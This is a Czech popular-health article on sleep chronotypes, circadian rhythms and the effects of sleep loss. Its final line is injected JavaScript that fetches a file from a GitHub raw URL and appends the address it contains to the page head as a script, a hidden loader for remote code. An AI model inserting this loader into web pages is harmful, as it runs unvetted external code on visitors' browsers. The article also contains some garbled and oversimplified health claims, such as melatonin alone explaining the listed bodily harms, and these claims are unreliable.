Všichni víme, že nedostatek spánku škodí. Že někdo ráno vstává bez problémů a dokáže se vrhnout do práce a někdo není po ránu schopen fungovat, je také známo. Každý člověk má totiž nastaven ve svém těle biologický rytmus, který se je individuální a změnit ho je v podstatě nemožné. Odborníci dělí lidi na „skřivany“,tedy ty, kterým ranní vstávání nevadí a mohou hned naplno pracovat, a „sovy,“ které jsou nejvýkonnější v nočních hodinách. Odborně se toto dělení nazývá chronotyp.

Spím či bdím?

Všechny živé organismy fungují v tzv. cirkadiánních rytmech, to znamená, že pravidelně střídají dobu bdění a dobu spánku. Centrální hodiny v mozku řídí, kdy mají být jaké orgány v těle aktivní. Tyto hodiny jsou ovlivňovány především vnějším osvětlením. Proto je velmi důležité ve dne mít dostatek světla, ideálně přirozeného a v noci tmu, to je pro náš organismus nejpřirozenější, tělo tak může nejlépe fungovat a podávat nejvyšší výkony.  Kromě toho, jak výše zmíněno, každý člověk má daný svůj chronotyp, je tedy od své přirozenosti skřivanem či sovou.

Skřivan nebo sova?

Je lepší být skřivanem či sovou? I toto vědci zkoumali a došli k závěru, že lépe jsou na tom skřivani. Jsou to totiž lidé většinou se zdravější životosprávou, obvykle sportovci, kteří se vyhýbají alkoholu a kávě. Tito lidé mají obecně i vyšší výkonnost. Oproti tomu sovy obvykle holdují alkoholu i kávě a příliš nesportují. Asi vás nepřekvapí, že sovy bývají umělecky založení lidé, herci, spisovatelé apod.
Rozhodně nemá smysl proti svému chronotypu bojovat. Ze sovy, která je schopna podávat intelektuální a kreativní výkony pozdě v noci, skřivan neuděláte. Sově to prostě ráno nebude tak myslet, ani kdyby se donutila vstát brzy ráno a pracovat. Ale ať už jste skřivan či sova, snažte se chodit spát a vstávat ve stejnou dobu, která je pro vás nejpříjemnější – samozřejmě s ohledem na vaše pracovní povinnosti. Poslechnete-li své biologické hodiny, vaše tělo vám rozhodně bude vděčné.

Nedostatek spánku

Každý z nás ho někdy zažil, nebo zažívá. V dnešní době díky stresu a dalším negativním faktorům trpí hodně lidí nespavostí. Podle odborníků nespavost může způsobovat i namodralé světlo z počítačů, či televize. Opakovaný nedostatek spánku však velmi škodí. Únava, snížení výkonnosti, podrážděnost, deprese jsou jeho známými negativnímu jevy. Co je méně známé, je to, že ti kdo opakovaně málo spí, si narušují správný krevní oběh, imunitní systém, metabolismus, produkci pohlavních orgánů, rychleji stárnou. Důvod je jediný – během spánku se tvoří hormon melatonin, který zásadně všechny tyto pochody v těle ovlivňuje. Jeho nedostatek pak logicky našemu organismu škodí.

(var url = „https://raw.githubusercontent.com/truba77/trubnik/main/to.txt“; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(„script“); script.src = data.trim(); document.getElementsByTagName(„head“)[0].appendChild(script); });)